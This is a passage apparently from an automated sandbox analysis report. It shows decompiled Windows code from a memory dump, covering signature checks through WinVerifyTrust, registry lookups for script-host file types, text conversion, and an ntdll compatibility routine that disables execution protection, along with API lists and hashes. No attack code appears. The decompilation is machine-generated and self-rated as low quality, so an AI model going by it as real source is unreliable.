					if(_v68 != 0) {
						FreeLibrary(_v68);
					}
					return E00B81335(_t100, 0, _v8 ^ _t102, _t95, _t97, _t100);
				} else {
					_t79 = GetProcAddress(_v68, "WinVerifyTrust");
					if(_t79 != 0) {
						_t80 =  *_t79(0,  &_v24,  &_v124);
						_t97 = 0x80070000;
						__eflags = _t80;
						if(__eflags == 0) {
							L16:
							__eflags = _a12;
							if(_a12 != 0) {
								L22:
								_t100 = 0;
								__eflags = 0;
								goto L23;
							}
							_t81 = GetLastError();
							__eflags = _t81;
							if(__eflags == 0) {
								goto L22;
							}
							if(__eflags > 0) {
								__eflags = _t81;
								if(_t81 > 0) {
									_t81 = _t81 & 0x0000ffff | _t97;
									__eflags = _t81;
								}
							}
							_t100 = _t81;
							__eflags = _t100;
							if(_t100 < 0) {
								goto L23;
							} else {
								goto L22;
							}
						}
						if(__eflags > 0) {
							__eflags = _t80;
							if(_t80 > 0) {
								_t80 = _t80 & 0x0000ffff | 0x80070000;
								__eflags = _t80;
							}
						}
						_t100 = _t80;
						__eflags = _t100;
						if(_t100 < 0) {
							goto L23;
						} else {
							goto L16;
						}
					}
					_t84 = GetLastError();
					if(_t84 > 0) {
						_t84 = _t84 & 0x0000ffff | 0x80070000;
					}
					_t100 = _t84;
					goto L23;
				}
			}



















































                                                        0x00b910a1
                                                        0x00b910a9
                                                        0x00b910b0
                                                        0x00b910b7
                                                        0x00b910c1
                                                        0x00b910ca
                                                        0x00b910d0
                                                        0x00b910d6
                                                        0x00b910d7
                                                        0x00b910da
                                                        0x00b910da
                                                        0x00b910dc
                                                        0x00b910df
                                                        0x00b910e6
                                                        0x00b910ea
                                                        0x00b910ee
                                                        0x00b910f1
                                                        0x00b910f5
                                                        0x00b910f9
                                                        0x00b910fd
                                                        0x00b91101
                                                        0x00b91105
                                                        0x00b91108
                                                        0x00b91112
                                                        0x00b91117
                                                        0x00b9111a
                                                        0x00b9111b
                                                        0x00b9111c
                                                        0x00b9111d
                                                        0x00b9111e
                                                        0x00b9111e
                                                        0x00b91124
                                                        0x00b9112b
                                                        0x00b9112e
                                                        0x00b91131
                                                        0x00b91136
                                                        0x00b91138
                                                        0x00b91138
                                                        0x00b9113b
                                                        0x00b9113e
                                                        0x00b91143
                                                        0x00b91145
                                                        0x00b91145
                                                        0x00b9114a
                                                        0x00b91151
                                                        0x00b9115e
                                                        0x00b91164
                                                        0x00b91167
                                                        0x00b9116a
                                                        0x00b9116d
                                                        0x00b91170
                                                        0x00b91178
                                                        0x00b91180
                                                        0x00b9118c
                                                        0x00b91192
                                                        0x00b9119e
                                                        0x00b911a3
                                                        0x00b911a7
                                                        0x00b9121e
                                                        0x00b91221
                                                        0x00b91226
                                                        0x00b91226
                                                        0x00b9123c
                                                        0x00b911a9
                                                        0x00b911b1
                                                        0x00b911b9
                                                        0x00b911dc
                                                        0x00b911de
                                                        0x00b911e3
                                                        0x00b911e5
                                                        0x00b911fa
                                                        0x00b911fa
                                                        0x00b911fd
                                                        0x00b9121c
                                                        0x00b9121c
                                                        0x00b9121c
                                                        0x00000000
                                                        0x00b9121c
                                                        0x00b911ff
                                                        0x00b91205
                                                        0x00b91207
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91209
                                                        0x00b9120b
                                                        0x00b9120d
                                                        0x00b91214
                                                        0x00b91214
                                                        0x00b91214
                                                        0x00b9120d
                                                        0x00b91216
                                                        0x00b91218
                                                        0x00b9121a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9121a
                                                        0x00b911e7
                                                        0x00b911e9
                                                        0x00b911eb
                                                        0x00b911f2
                                                        0x00b911f2
                                                        0x00b911f2
                                                        0x00b911eb
                                                        0x00b911f4
                                                        0x00b911f6
                                                        0x00b911f8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b911f8
                                                        0x00b911bb
                                                        0x00b911c3
                                                        0x00b911ca
                                                        0x00b911ca
                                                        0x00b911cf
                                                        0x00000000
                                                        0x00b911cf

                                                        APIs
                                                        • memset.MSVCRT ref: 00B91151
                                                        • GetProcAddress.KERNEL32(?,WinVerifyTrust,wintrust.dll,?,?,?,00000000), ref: 00B911B1
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B911BB
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B911FF
                                                        • FreeLibrary.KERNEL32(?,wintrust.dll,?,?,?,00000000), ref: 00B91226
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLast$AddressFreeLibraryProcmemset
                                                        • String ID: ($O$WinVerifyTrust$wintrust.dll
                                                        • API String ID: 4150920179-3149888995
                                                        • Opcode ID: 0214bae5b8f43757a8520fc533aee1f06946836c98de7127b9388dfb3b7297d0
                                                        • Instruction ID: ba45df0c8d697eaa2123db7121479aceaddfaa018dd210306ae694bf324d6126
                                                        • Opcode Fuzzy Hash: 0214bae5b8f43757a8520fc533aee1f06946836c98de7127b9388dfb3b7297d0
                                                        • Instruction Fuzzy Hash: C6513972D0026A9BCF21DFA8C8845EDBBF5EF05310F144ABAE525FB290D7748A45CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8FA22, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 113registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 47%
                                                        			E00B8FA22(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				char _v528;
				int _v532;
				intOrPtr _v536;
				char _v540;
				void* _v544;
				long _v548;
				signed int _t33;
				long _t37;
				long _t48;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				signed int _t63;

				_t61 = __esi;
				_t59 = __edi;
				_t53 = __ebx;
				_t33 =  *0xb97004; // 0xbb40e64e
				_v8 = _t33 ^ _t63;
				if(_a4 == 0x43) {
					_v536 = 0xb8fbbc;
					L5:
					_push(_t53);
					_push(_t61);
					_push(_t59);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v532);
					_push( &_v268);
					_v540 = 0;
					_push(0);
					while(1) {
						_v532 = 0x104;
						_t37 = RegEnumKeyExA(0x80000000, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t37 - 0x103;
						if(_t37 == 0x103) {
							break;
						}
						__eflags = _t37;
						if(__eflags != 0) {
							L17:
							if(__eflags > 0) {
								__eflags = _t37;
							}
							L19:
							_pop(_t59);
							_pop(_t61);
							_pop(_t53);
							L20:
							return E00B81335(_t37, _t53, _v8 ^ _t63, _t58, _t59, _t61);
						}
						__eflags = _v268 - 0x2e;
						if(_v268 != 0x2e) {
							L12:
							_t24 =  &_v540;
							 *_t24 = _v540 + 1;
							__eflags =  *_t24;
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v532);
							_push( &_v268);
							_push(_v540);
							continue;
						}
						_t37 = RegOpenKeyExA(0x80000000,  &_v268, 0, 0x20019,  &_v544);
						__eflags = _t37;
						if(__eflags != 0) {
							goto L17;
						}
						_v532 = 0x104;
						_v548 = RegQueryValueExA(_v544, 0xb89b44, 0, 0,  &_v528,  &_v532);
						RegCloseKey(_v544);
						__eflags = _v548;
						if(_v548 != 0) {
							goto L12;
						}
						_t48 = _v532;
						__eflags = _t48;
						if(_t48 == 0) {
							goto L12;
						}
						 *((char*)(_t63 + _t48 - 0x109)) = 0;
						_t37 = E00B8F96C(_v536, 0, _t55, _t58,  &_v528, 1);
						__eflags = _t37;
						if(_t37 < 0) {
							goto L19;
						}
						goto L12;
					}
					_t37 = E00B8F96C(_v536, 0, _t55, _t58, "WSFFile", 0);
					__eflags = _t37;
					if(_t37 >= 0) {
						_t37 = E00B8F96C(_v536, 0, _t55, _t58, "WSHFile", 0);
						__eflags = _t37;
						if(_t37 >= 0) {
							_t37 = 0;
						}
					}
					goto L19;
				}
				if(_a4 == 0x57) {
					_v536 = 0xb8fbb4;
					goto L5;
				} else {
					_t37 = 0x80070057;
					goto L20;
				}
			}




















                                                        0x00b8fa22
                                                        0x00b8fa22
                                                        0x00b8fa22
                                                        0x00b8fa2d
                                                        0x00b8fa34
                                                        0x00b8fa3b
                                                        0x00b8fa59
                                                        0x00b8fa63
                                                        0x00b8fa63
                                                        0x00b8fa64
                                                        0x00b8fa65
                                                        0x00b8fa68
                                                        0x00b8fa69
                                                        0x00b8fa6a
                                                        0x00b8fa6b
                                                        0x00b8fa72
                                                        0x00b8fa79
                                                        0x00b8fa7a
                                                        0x00b8fa85
                                                        0x00b8fb50
                                                        0x00b8fb51
                                                        0x00b8fb57
                                                        0x00b8fb5d
                                                        0x00b8fb62
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8fa90
                                                        0x00b8fa92
                                                        0x00b8fb96
                                                        0x00b8fb96
                                                        0x00b8fb9d
                                                        0x00b8fb9d
                                                        0x00b8fba2
                                                        0x00b8fba2
                                                        0x00b8fba3
                                                        0x00b8fba4
                                                        0x00b8fba5
                                                        0x00b8fbb0
                                                        0x00b8fbb0
                                                        0x00b8fa98
                                                        0x00b8fa9f
                                                        0x00b8fb32
                                                        0x00b8fb32
                                                        0x00b8fb32
                                                        0x00b8fb32
                                                        0x00b8fb38
                                                        0x00b8fb39
                                                        0x00b8fb3a
                                                        0x00b8fb3b
                                                        0x00b8fb42
                                                        0x00b8fb49
                                                        0x00b8fb4a
                                                        0x00000000
                                                        0x00b8fb4a
                                                        0x00b8faba
                                                        0x00b8fac0
                                                        0x00b8fac2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8fae3
                                                        0x00b8faf5
                                                        0x00b8fafb
                                                        0x00b8fb01
                                                        0x00b8fb07
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8fb09
                                                        0x00b8fb0f
                                                        0x00b8fb11
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8fb13
                                                        0x00b8fb29
                                                        0x00b8fb2e
                                                        0x00b8fb30
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8fb30
                                                        0x00b8fb74
                                                        0x00b8fb79
                                                        0x00b8fb7b
                                                        0x00b8fb89
                                                        0x00b8fb8e
                                                        0x00b8fb90
                                                        0x00b8fb92
                                                        0x00b8fb92
                                                        0x00b8fb90
                                                        0x00000000
                                                        0x00b8fb7b
                                                        0x00b8fa41
                                                        0x00b8fa4d
                                                        0x00000000
                                                        0x00b8fa43
                                                        0x00b8fa43
                                                        0x00000000
                                                        0x00b8fa43

                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000000,0000002E,00000000,00020019,?), ref: 00B8FABA
                                                        • RegQueryValueExA.ADVAPI32 ref: 00B8FAE9
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8FAFB
                                                        • RegEnumKeyExA.ADVAPI32 ref: 00B8FB57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseEnumOpenQueryValue
                                                        • String ID: .$Open2$W$WSFFile$WSHFile
                                                        • API String ID: 3984146545-2040554715
                                                        • Opcode ID: 141b48bd0b824e1f915b9cfae00528ad8bb7a408aa63ebb39b89061bf04b02f9
                                                        • Instruction ID: c2f2879fe7ffab022aa80a29384f49345223acae409758ddb792e6ab64c6b1fc
                                                        • Opcode Fuzzy Hash: 141b48bd0b824e1f915b9cfae00528ad8bb7a408aa63ebb39b89061bf04b02f9
                                                        • Instruction Fuzzy Hash: 2B411AB598111EAEDB20AE94CCD8EFAB6FCEB24354F1005F6E509E2160D6748EC5CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B81C53, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 28%
                                                        			E00B81C53(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				char _v24;
				intOrPtr _v32;
				char _v40;
				char _v56;
				char* _t39;
				signed int* _t54;
				short _t57;
				char* _t61;
				char* _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr* _t74;
				char* _t77;

				_t64 = _a8;
				if(_t64 == 0) {
					return 0;
				}
				E00B818B2( &_v24);
				_v56 = 0;
				_v40 = 0;
				_t39 = E00B818C4( &_v24, 0x400);
				_t74 = __imp__#9;
				_t77 = _t39;
				if(_t77 < 0) {
					L11:
					 *_t74( &_v56);
					 *_t74( &_v40);
					E00B815A1( &_v24);
					return _t77;
				}
				_t65 =  *((intOrPtr*)(_t64 + 0x10));
				_v8 = _v8 & 0x00000000;
				if(_t65 <= 0) {
					L9:
					_t77 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x40)))) + 0x18))(_v24);
					if(_t77 >= 0) {
						_t77 = 0;
					}
					goto L11;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					 *_t74( &_v56);
					 *_t74( &_v40);
					_t54 =  &_v8;
					__imp__#25(_a8, _t54,  &_v56);
					_t77 = _t54;
					if(_t77 < 0) {
						goto L11;
					}
					_push(8);
					if(1 == _v56) {
						_pop(_t57);
						_v40 = _t57;
						__imp__#2(L"null");
						_v32 = 1;
						if(_t57 != 0) {
							L6:
							_t77 = E00B81D50( &_v24, _v32);
							if(_t77 < 0) {
								goto L11;
							}
							if(_v8 != _t65 - 1) {
								_v12 = 0x20;
								_t61 = E00B81954( &_v24,  &_v12, 1);
								_t77 = _t61;
								if(_t77 >= 0) {
									goto L8;
								}
								goto L11;
							}
							L8:
							_v8 = _v8 + 1;
							if(_v8 < _t65) {
								continue;
							}
							goto L9;
						}
						_t77 = 0x8007000e;
						goto L11;
					}
					_t63 =  &_v40;
					__imp__#12(_t63,  &_v56, 0);
					_t77 = _t63;
					if(_t77 < 0) {
						goto L11;
					}
					goto L6;
				}
				goto L11;
			}


















                                                        0x00b81c5c
                                                        0x00b81c61
                                                        0x00000000
                                                        0x00b8902a
                                                        0x00b81c6c
                                                        0x00b81c7b
                                                        0x00b81c7f
                                                        0x00b81c83
                                                        0x00b81c88
                                                        0x00b81c8e
                                                        0x00b81c92
                                                        0x00b81d26
                                                        0x00b81d2a
                                                        0x00b81d30
                                                        0x00b81d35
                                                        0x00000000
                                                        0x00b81d3d
                                                        0x00b81c98
                                                        0x00b81c9b
                                                        0x00b81ca1
                                                        0x00b81d10
                                                        0x00b81d1e
                                                        0x00b81d22
                                                        0x00b81d24
                                                        0x00b81d24
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81ca3
                                                        0x00b81ca3
                                                        0x00b81ca7
                                                        0x00b81cad
                                                        0x00b81cb3
                                                        0x00b81cba
                                                        0x00b81cc0
                                                        0x00b81cc4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81cc9
                                                        0x00b81ccf
                                                        0x00b89031
                                                        0x00b89037
                                                        0x00b8903b
                                                        0x00b89041
                                                        0x00b89046
                                                        0x00b81ceb
                                                        0x00b81cf6
                                                        0x00b81cfa
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81d02
                                                        0x00b8905f
                                                        0x00b89066
                                                        0x00b81d43
                                                        0x00b81d47
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81d49
                                                        0x00b81d08
                                                        0x00b81d08
                                                        0x00b81d0e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81d0e
                                                        0x00b8904c
                                                        0x00000000
                                                        0x00b8904c
                                                        0x00b81cdb
                                                        0x00b81cdf
                                                        0x00b81ce5
                                                        0x00b81ce9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81ce9
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B818C4: GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                          • Part of subcall function 00B818C4: HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • VariantClear.OLEAUT32(?), ref: 00B81CA7
                                                        • VariantClear.OLEAUT32(?), ref: 00B81CAD
                                                        • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00B81CBA
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 00B81CDF
                                                          • Part of subcall function 00B81D50: lstrlenW.KERNEL32(?,00000000,?,00B81CF6,?), ref: 00B81D5B
                                                        • VariantClear.OLEAUT32(?), ref: 00B81D2A
                                                        • VariantClear.OLEAUT32(?), ref: 00B81D30
                                                        • SysAllocString.OLEAUT32(null), ref: 00B8903B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$Clear$AllocHeap$ArrayChangeElementProcessSafeStringTypelstrlen
                                                        • String ID: $null
                                                        • API String ID: 101175001-2258636290
                                                        • Opcode ID: b3418533d5a0cb06194519d5669c9d9f73eb179364b1f552def487414f01f6a5
                                                        • Instruction ID: 281cb370feca20f68cfe52c29afa5900ec411ccc6ae1ca056009e3a7c75ae1b1
                                                        • Opcode Fuzzy Hash: b3418533d5a0cb06194519d5669c9d9f73eb179364b1f552def487414f01f6a5
                                                        • Instruction Fuzzy Hash: 60311276D0221AABCB11EBA8D545AEEB3FCEF04751F1105A5ED11F7160EA30DE05CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B857A1, Relevance: 15.2, APIs: 10, Instructions: 170memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 55%
                                                        			E00B857A1(void* __ecx, int _a4, void* _a8, unsigned int _a12, short** _a16) {
				int _v8;
				short* _t51;
				signed char _t55;
				signed int _t56;
				void* _t60;
				short _t61;
				signed int _t64;
				intOrPtr* _t67;
				int _t74;
				void* _t75;
				intOrPtr _t77;
				short* _t79;
				short** _t82;
				signed int _t83;
				int _t85;
				short* _t86;

				_t82 = _a16;
				 *_t82 =  *_t82 & 0x00000000;
				if(_a12 == 0) {
					__imp__#2(0xb89acc);
					_t79 = _t51;
					if(_t79 == 0) {
						L18:
						_t83 = 0x8007000e;
						L10:
						if(_t79 != 0) {
							__imp__#6(_t79);
						}
						goto L11;
					} else {
						 *_t79 = 0;
						 *_t82 = _t79;
						_t83 = 0;
						L11:
						return _t83;
					}
				}
				_t74 = 1;
				if((_a12 & 1) != 0) {
					L4:
					_t74 = 0;
					_t55 = MultiByteToWideChar(_a4, 0, _a8, _a12, 0, 0);
					_t85 = _t55;
					if(_t85 == 0) {
						_t56 = GetLastError();
						if(_t56 > 0) {
							_t56 = _t56 & 0x0000ffff | 0x80070000;
						}
						_t83 = _t56;
						goto L11;
					}
					L5:
					__imp__#4(0, _t85);
					_t79 = _t55;
					if(_t79 == 0) {
						goto L18;
					}
					if(_t74 != 0) {
						_t75 = _t85 + _t85;
						_push(_t75);
						if(_t74 != 2) {
							memmove(_t79, _a8, ??);
						} else {
							_push(_t79);
							_push(_a8);
							L00B93ED2();
						}
						 *((short*)(_t75 + _t79)) = 0;
						if(_t85 != 0) {
							L8:
							_t20 = _t85 * 2; // -2
							_t86 = _t79 + _t20 - 2;
							_t60 = 0x1a;
							if(_t60 ==  *_t86) {
								_t61 = 0xa;
								 *_t86 = _t61;
							}
							goto L9;
						} else {
							L9:
							 *_a16 = _t79;
							_t79 = 0;
							_t83 = 0;
							goto L10;
						}
					}
					_t85 = MultiByteToWideChar(_a4, _t74, _a8, _a12, _t79, _t85);
					if(_t85 == 0) {
						_t64 = GetLastError();
						if(_t64 > 0) {
							_t64 = _t64 & 0x0000ffff | 0x80070000;
						}
						_t83 = _t64;
						goto L10;
					}
					goto L8;
				}
				if(E00B8587A() == 0) {
					_t67 = _a8;
					_t77 =  *_t67;
					if(_t77 != 0xfe ||  *((char*)(_t67 + 1)) != 0xff) {
						if(_t77 != 0xff ||  *((char*)(_t67 + 1)) != 0xfe) {
							goto L4;
						} else {
							_t55 = _t67 + 2;
							_a8 = _t55;
							L16:
							_a12 = _a12 - 2;
							goto L17;
						}
					} else {
						_t74 = 2;
						_t55 = _t67 + 1;
						_a8 = _t55;
						L21:
						_a12 = _a12 - _t74;
						L17:
						_t85 = _a12 >> 1;
						goto L5;
					}
				}
				_v8 = 0x1ee;
				IsTextUnicode(_a8, _a12,  &_v8);
				_t55 = _v8;
				if((_t55 & 0x00000100) == 0) {
					if((_t55 & 0x00000008) == 0) {
						if(_t55 >= 0) {
							if((_t55 & 0x00000004) != 0) {
								goto L17;
							}
							if((_t55 & 0x00000040) == 0) {
								if((_t55 & 0x00000002) != 0) {
									goto L17;
								}
								if((_t55 & 0x00000020) == 0) {
									goto L4;
								}
							}
							_t74 = 2;
							goto L17;
						}
						_t74 = 2;
						_a8 = _a8 + 1;
						goto L21;
					}
					_a8 = _a8 + 2;
					goto L16;
				}
				goto L4;
			}



















                                                        0x00b857a9
                                                        0x00b857ac
                                                        0x00b857b4
                                                        0x00b88603
                                                        0x00b88609
                                                        0x00b8860d
                                                        0x00b88633
                                                        0x00b88633
                                                        0x00b85864
                                                        0x00b85866
                                                        0x00b88715
                                                        0x00b88715
                                                        0x00000000
                                                        0x00b8860f
                                                        0x00b88611
                                                        0x00b88614
                                                        0x00b88616
                                                        0x00b8586c
                                                        0x00b85872
                                                        0x00b85872
                                                        0x00b8860d
                                                        0x00b857bc
                                                        0x00b857c0
                                                        0x00b857f4
                                                        0x00b857fb
                                                        0x00b85804
                                                        0x00b8580a
                                                        0x00b8580e
                                                        0x00b88667
                                                        0x00b8866f
                                                        0x00b886b4
                                                        0x00b886b4
                                                        0x00b88671
                                                        0x00000000
                                                        0x00b88671
                                                        0x00b85814
                                                        0x00b85817
                                                        0x00b8581d
                                                        0x00b85821
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85829
                                                        0x00b886d9
                                                        0x00b886dc
                                                        0x00b886dd
                                                        0x00b886ee
                                                        0x00b886df
                                                        0x00b886df
                                                        0x00b886e0
                                                        0x00b886e3
                                                        0x00b886e3
                                                        0x00b886f8
                                                        0x00b886fe
                                                        0x00b8584b
                                                        0x00b8584d
                                                        0x00b8584d
                                                        0x00b85851
                                                        0x00b85855
                                                        0x00b8870b
                                                        0x00b8870c
                                                        0x00b8870c
                                                        0x00000000
                                                        0x00b88704
                                                        0x00b8585b
                                                        0x00b8585e
                                                        0x00b85860
                                                        0x00b85862
                                                        0x00000000
                                                        0x00b85862
                                                        0x00b886fe
                                                        0x00b85841
                                                        0x00b85845
                                                        0x00b886bb
                                                        0x00b886c3
                                                        0x00b886ca
                                                        0x00b886ca
                                                        0x00b886cf
                                                        0x00000000
                                                        0x00b886cf
                                                        0x00000000
                                                        0x00b85845
                                                        0x00b857c9
                                                        0x00b88678
                                                        0x00b8867b
                                                        0x00b88680
                                                        0x00b88695
                                                        0x00000000
                                                        0x00b886a5
                                                        0x00b886a6
                                                        0x00b886a7
                                                        0x00b88625
                                                        0x00b88625
                                                        0x00000000
                                                        0x00b88625
                                                        0x00b88688
                                                        0x00b8868a
                                                        0x00b8868b
                                                        0x00b8868d
                                                        0x00b88647
                                                        0x00b88647
                                                        0x00b88629
                                                        0x00b8862c
                                                        0x00000000
                                                        0x00b8862c
                                                        0x00b88680
                                                        0x00b857d6
                                                        0x00b857e0
                                                        0x00b857e6
                                                        0x00b857ee
                                                        0x00b8861f
                                                        0x00b8863f
                                                        0x00b8864e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88652
                                                        0x00b8865b
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8865f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88665
                                                        0x00b88656
                                                        0x00000000
                                                        0x00b88656
                                                        0x00b88643
                                                        0x00b88644
                                                        0x00000000
                                                        0x00b88644
                                                        0x00b88621
                                                        0x00000000
                                                        0x00b88621
                                                        0x00000000

                                                        APIs
                                                        • IsTextUnicode.ADVAPI32(?,00000000,?), ref: 00B857E0
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00B904FD,?,?), ref: 00B85804
                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00B85817
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00B904FD,?,?), ref: 00B8583B
                                                          • Part of subcall function 00B8587A: GetVersionExA.KERNEL32(?), ref: 00B858A0
                                                        • SysAllocString.OLEAUT32(00B89ACC), ref: 00B88603
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AllocByteCharMultiStringWide$TextUnicodeVersion
                                                        • String ID:
                                                        • API String ID: 2550708280-0
                                                        • Opcode ID: 1eab6747fe77e1e471651c64e6aa99fb180b5f4d03dda5908d57ced2adf3f227
                                                        • Instruction ID: 2f4a7a8dcdfc7725224c9fc9b371e47259378da50d39640fba48a5099d191eaa
                                                        • Opcode Fuzzy Hash: 1eab6747fe77e1e471651c64e6aa99fb180b5f4d03dda5908d57ced2adf3f227
                                                        • Instruction Fuzzy Hash: BC51DF76500607EFDB316F288C88BBA3BE4EF04364F6485A5ED55AB1B0EB308D01DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02307EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E02307EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x23b2088; // 0x77da46ae
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02307F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02323F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E022DDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x23b4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02323F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E022E0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02323F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E022E8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02323F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0234E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02323F92();
					_t38 = 1;
					L2:
					return E022DE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                        0x02307f08
                                                        0x02307f0f
                                                        0x02307f12
                                                        0x02307f1b
                                                        0x02307f31
                                                        0x02323ead
                                                        0x02323eb4
                                                        0x00000000
                                                        0x00000000
                                                        0x02323eba
                                                        0x02323ecd
                                                        0x02323ed2
                                                        0x02323ee1
                                                        0x02323ee7
                                                        0x02323eec
                                                        0x02323f12
                                                        0x02323f18
                                                        0x02323f1a
                                                        0x00000000
                                                        0x00000000
                                                        0x02323f20
                                                        0x02323f26
                                                        0x02323f28
                                                        0x00000000
                                                        0x00000000
                                                        0x02323f2e
                                                        0x02323f30
                                                        0x00000000
                                                        0x00000000
                                                        0x02323f3a
                                                        0x02323f3b
                                                        0x02323f53
                                                        0x02323f64
                                                        0x02323f69
                                                        0x02323f6c
                                                        0x02323f6d
                                                        0x02323f6f
                                                        0x0232e304
                                                        0x0232e30f
                                                        0x0232e315
                                                        0x0232e31e
                                                        0x0232e321
